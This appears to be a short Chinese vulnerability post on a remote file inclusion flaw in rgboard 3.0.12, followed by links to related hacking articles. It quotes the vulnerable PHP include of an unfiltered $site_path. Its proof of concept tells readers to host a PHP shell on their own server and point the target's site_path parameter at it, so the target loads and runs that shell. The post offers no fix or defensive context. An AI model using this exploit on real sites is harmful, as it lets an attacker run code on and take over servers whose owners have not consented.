rgboard 3.0.12 远程文件包含漏洞

所属分类: 实用技巧 / 漏洞研究 阅读数: 1362
收藏 0 赞 0 分享
vul code:
\include\bbs.lib.inc.php:
if (!defined('BBS_LIB_INC_INCLUDED')) {
define('BBS_LIB_INC_INCLUDED', 1);
// *– BBS_LIB_INC_INCLUDED START –*
if(!$site_path) $site_path='./';
require_once “{$site_path}include/lib.inc.php”;
//$site_path没有过滤直接放过来包含了
poc:
在你的网站放个phpshell,目录和文件名为/include/lib.inc.php
然后访问
httP://www.target.com/include/bbs.lib.inc.php?site_path=http://yousite/
更多精彩内容其他人还在看

悬念音乐程序安装程序写马(图)

悬念音乐程序安装程序写马(图)
收藏 0 赞 0 分享

为什么经常被网络入侵?探究原因

为什么经常被网络入侵?探究原因
收藏 0 赞 0 分享

黑客之门的魅力:感染与加载(图)

黑客之门的魅力:感染与加载(图)
收藏 0 赞 0 分享

诱人视频请君入瓮 解析RealPlayer溢出漏洞

诱人视频请君入瓮 解析RealPlayer溢出漏洞
收藏 0 赞 0 分享

漏洞漫舞的飞骋

漏洞漫舞的飞骋
收藏 0 赞 0 分享

穷追猛打:破译Foxmail“密码天书”

穷追猛打:破译Foxmail“密码天书”
收藏 0 赞 0 分享

BBSXP漏洞再探究

BBSXP漏洞再探究
收藏 0 赞 0 分享

安全技术—RSA公钥密码体制安全性分析

安全技术—RSA公钥密码体制安全性分析
收藏 0 赞 0 分享

蜜罐技术:消除防火墙局限和脆弱

蜜罐技术:消除防火墙局限和脆弱
收藏 0 赞 0 分享

跨站脚本说明

跨站脚本说明
收藏 0 赞 0 分享
查看更多